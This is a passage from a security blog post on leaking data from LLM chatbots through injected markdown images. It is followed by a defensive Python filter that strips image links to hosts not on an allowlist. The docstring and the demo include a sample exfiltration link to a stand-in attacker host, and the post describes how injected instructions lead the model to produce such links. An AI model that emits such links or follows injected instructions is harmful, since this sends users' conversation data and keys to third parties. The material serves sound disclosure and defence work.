Sept. 29, 2023, 5 p.m.

Embrace The Red embracethered.com

Large Language Model (LLM) applications and chatbots are commonly vulnerable to data exfiltration; exfiltration via image markdown injection is a particularly frequent variant.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, and ChatGPT has a known vulnerability that OpenAI has marked as "won't fix."
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.

From Untrusted Data to Data Exfiltration

When untrusted data makes it into the LLM …
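To make the attack pattern concrete, here is a minimal sketch of why auto-rendered markdown images can leak chat data, together with one possible mitigation: filtering image URLs in model output against an allowlist before the UI renders them. This is illustrative only, not the exploit or fix described in the post; the domain list, the attacker.example URL, and the strip_untrusted_images helper are hypothetical names.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: domains the chat UI is permitted to load images from.
ALLOWED_IMAGE_DOMAINS = {"learn.microsoft.com"}

# Matches markdown images of the form ![alt](url ...), capturing the URL.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(llm_output: str) -> str:
    """Drop markdown images whose host is not on the allowlist.

    An injected instruction in untrusted data (a web page, document, etc.)
    can make the model emit something like
    ![x](https://attacker.example/log?q=<data from the conversation>).
    A chat UI that renders images automatically then sends that data to the
    attacker's server in the image request.
    """

    def _filter(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_DOMAINS else ""

    return MARKDOWN_IMAGE.sub(_filter, llm_output)


if __name__ == "__main__":
    poisoned = "Summary done. ![x](https://attacker.example/log?q=user+api+key)"
    print(strip_untrusted_images(poisoned))  # the exfiltration image is removed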

